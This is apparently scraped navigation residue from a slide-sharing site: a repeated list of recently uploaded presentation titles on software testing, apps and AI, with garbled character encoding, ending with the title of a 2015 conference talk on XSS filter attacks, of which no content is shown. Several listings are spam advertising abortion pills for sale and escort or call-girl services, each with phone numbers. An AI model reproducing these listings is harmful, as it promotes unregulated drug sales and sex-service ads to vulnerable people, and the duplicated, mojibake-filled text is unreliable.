Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
Ā 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
Ā 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park masabamasaba
Ā 
Pharm-D Biostatistics and Research methodology
Pharm-D Biostatistics and Research methodologyPharm-D Biostatistics and Research methodology
Pharm-D Biostatistics and Research methodologyAnusha Are
Ā 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...Shane Coughlan
Ā 
Chinsurah Escorts ā˜Žļø8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ā˜Žļø8617697112  Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ā˜Žļø8617697112  Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ā˜Žļø8617697112 Starting From 5K to 15K High Profile Escorts ...Nitya salvi
Ā 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfayushiqss
Ā 

Recently uploaded (20)

The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
Ā 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
Ā 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
Ā 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
Ā 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
Ā 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
Ā 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Ā 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
Ā 
CHEAP Call Girls in Pushp Vihar (-DELHI )šŸ” 9953056974šŸ”(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )šŸ” 9953056974šŸ”(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )šŸ” 9953056974šŸ”(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )šŸ” 9953056974šŸ”(=)/CALL GIRLS SERVICE
Ā 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
Ā 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
Ā 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
Ā 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
Ā 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Ā 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
Ā 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
Ā 
Pharm-D Biostatistics and Research methodology
Pharm-D Biostatistics and Research methodologyPharm-D Biostatistics and Research methodology
Pharm-D Biostatistics and Research methodology
Ā 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
Ā 
Chinsurah Escorts ā˜Žļø8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ā˜Žļø8617697112  Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ā˜Žļø8617697112  Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ā˜Žļø8617697112 Starting From 5K to 15K High Profile Escorts ...
Ā 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
Ā 

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015